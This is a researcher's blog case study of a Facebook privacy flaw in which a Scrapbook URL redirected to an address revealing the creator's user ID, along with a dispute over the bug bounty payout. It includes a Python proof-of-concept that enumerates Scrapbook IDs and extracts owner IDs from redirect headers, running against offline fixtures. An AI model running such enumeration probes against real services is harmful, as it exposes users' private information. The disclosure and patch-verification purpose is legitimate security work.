The Beauty And The Thoughtful

Are you following FogMarks?

Today’s case-study is based on some recent events and misunderstandings I had with Facebook, and its main goal is to set researchers’ expectations of bug bounty programs. Both sides will be presented, of course, and you are welcome to share your opinion in the comments section.

So, back in July I found that it was possible to link Scrapbooks that users had created for their pets or family members back to the users themselves (the people the pet or family member belongs to), even when the user had set the privacy of the pet or family member to ‘Only me’.

Any user could do this, even one who was not friends with the victim. All the attacker had to do was access this Facebook mobile URL: http://m.facebook.com/<SCRAPEBOOK_ID>/

After accessing this URL, the attacker was redirected to another URL: https://m.facebook.com/<CREATOR_FACEBOOK_USER_ID>/scrapbooks/ft.<SCRAPEBOOK_ID>/?_rdr

and the name and type of the Scrapbook were displayed, even when its creator (the victim) had set its privacy to ‘Only me’.

12 days after the initial report Facebook said that the issue was ‘not reproducible’, and after my reply I was asked to provide even more information, so I created a full PoC video. Watch it to get the full picture, and only then continue reading.

So, as you can see, accessing the supplied URL indeed redirected the attacker to the Scrapbook created by the victim and revealed the Scrapbook name (which is not private) and the Scrapbook creator’s ID (the FBID of the victim user).

5 days after I sent the PoC video Facebook finally acknowledged the issue and forwarded it for a fix.

2 months after the acknowledgement I received a mail from Facebook asking me to confirm the patch. The fix simply denies unauthorized users access to the vulnerable URL, so they are no longer redirected to the Scrapbook.
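The check behind both the original finding and the patch confirmation is the same: request the short mobile URL unauthenticated, do not follow redirects, and look at the Location header of the first response, because that header (not the final page) is what carries the creator’s FBID. The script below is an added example written for this post, not the author’s PoC or any Facebook code. It takes the two URL shapes from the post as given, but the HTTP layer is injected and the IDs, responses and the post-fix status code are constructed fixtures, since the post does not state what the patched endpoint returns.

```python
import re
from typing import Callable, Dict, List, Optional, Tuple

# URL shapes as the post describes them: the attacker requests the short
# mobile URL and is redirected to the creator-scoped scrapbook URL, whose
# path segment uses the 'ft.<ID>' form quoted in the post.
PROBE_URL = "http://m.facebook.com/{scrapbook_id}/"
REDIRECT_RE = re.compile(
    r"^https?://m\.facebook\.com/(?P<owner_id>\d+)/scrapbooks/ft\.(?P<scrapbook_id>\d+)/"
)

# A response is modelled as (status_code, headers). The fetch callable is
# injected so this runs offline; a real run would wrap an unauthenticated
# HTTP client with redirects DISABLED, because the leak lives in the
# Location header of the first response, not in the final page body.
Response = Tuple[int, Dict[str, str]]
Fetcher = Callable[[str], Response]


def owner_from_redirect(status: int, headers: Dict[str, str]) -> Optional[Tuple[str, str]]:
    """Return (owner_fbid, scrapbook_id) when the response is a redirect whose
    Location matches the creator-scoped scrapbook URL, otherwise None."""
    if status not in (301, 302, 303, 307, 308):
        return None
    location = headers.get("Location") or headers.get("location") or ""
    m = REDIRECT_RE.match(location)
    if not m:
        return None
    return m.group("owner_id"), m.group("scrapbook_id")


def probe(scrapbook_ids: List[str], fetch: Fetcher) -> Dict[str, Optional[str]]:
    """Map each candidate ID to the owner FBID it leaks, or None when the
    endpoint hands nothing out (denied, not found, or not a scrapbook)."""
    leaked: Dict[str, Optional[str]] = {}
    for sid in scrapbook_ids:
        status, headers = fetch(PROBE_URL.format(scrapbook_id=sid))
        hit = owner_from_redirect(status, headers)
        # Only count it when the redirect is for the ID we asked about.
        leaked[sid] = hit[0] if hit and hit[1] == sid else None
    return leaked


def verify_fix(scrapbook_ids: List[str], fetch: Fetcher) -> bool:
    """Patch-confirmation check: True when no probed ID leaks an owner."""
    return all(v is None for v in probe(scrapbook_ids, fetch).values())


# --- constructed fixtures: not real Facebook IDs or real server responses ---
_FAKE_SCRAPBOOKS = {"1000000000000001": "4242424242"}  # scrapbook_id -> owner FBID


def _fetch_before_patch(url: str) -> Response:
    """Pre-fix behaviour as the post describes it: an unauthenticated request
    for a scrapbook ID is answered with a redirect embedding the owner's FBID."""
    sid = url.rstrip("/").rsplit("/", 1)[-1]
    owner = _FAKE_SCRAPBOOKS.get(sid)
    if owner is None:
        return 404, {}
    return 302, {"Location": f"https://m.facebook.com/{owner}/scrapbooks/ft.{sid}/?_rdr"}


def _fetch_after_patch(url: str) -> Response:
    """Assumed post-fix behaviour: the post only says unauthorized users were
    denied access to the URL, so a plain 404 without Location is assumed."""
    return 404, {}


if __name__ == "__main__":
    ids = ["1000000000000001", "1000000000000002"]
    print("before patch:", probe(ids, _fetch_before_patch))
    print("fix verified:", verify_fix(ids, _fetch_after_patch))
```

Swapping `_fetch_before_patch` for a real client that has redirects disabled turns `probe` into the original finding and `verify_fix` into the patch confirmation; keeping the two as separate fixtures makes it obvious that the same probe must go from leaking an owner to leaking nothing.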

2 days after I confirmed the patch, I got a long mail reply stating:

Thanks for confirming the fix. I’ve discussed this report with the team and unfortunately we’ve determined that this report does not qualify under our program.

Ultimately the risk here was that someone who could guess the FBID of a scrapbook could see the owner of that scrapbook. The “name” here isn’t a private piece of information: it will show up whenever the child or pet is tagged, for example, and so any changes related to that aren’t particularly relevant here. The risk of someone searching such a large space of potential IDs in the hope of finding a particular type of object (rare) in a particular configuration (even rarer) makes it highly implausible that any information would be inadvertently discovered here. Even if you were to look through the space your search would be untargeted and could not recover information about a particular person.

In general we attempt to determine whether or not a report qualifies under our program shortly after the initial report is submitted. In this case we failed to do so, and you have my apologies for that. Please let me know if you have any additional questions here.

Or, in short: thanks for confirming the fix; now that we have fixed it, we see that the vulnerability’s impact could only be achieved with some hard work (iterating over Scrapbook IDs), so the report does not qualify and you won’t be rewarded for it.

And now I am asking: how rude is it to hold a vulnerability for 3 months, fix it, and then, only then, after the fix is deployed to production and there is no way to demonstrate any other aspect of the impact, tell the researcher: “Thanks, but no thanks”?

This case-study is here to show researchers the range of opinions that can exist about any report. In your opinion the vulnerability is severe, a must-fix that should not even be questioned, but in the eyes of the company or the person who validates the vulnerability it is a feature, not a bug.

I would like to hear your opinion regarding this in the comments section below, on Twitter or by email.
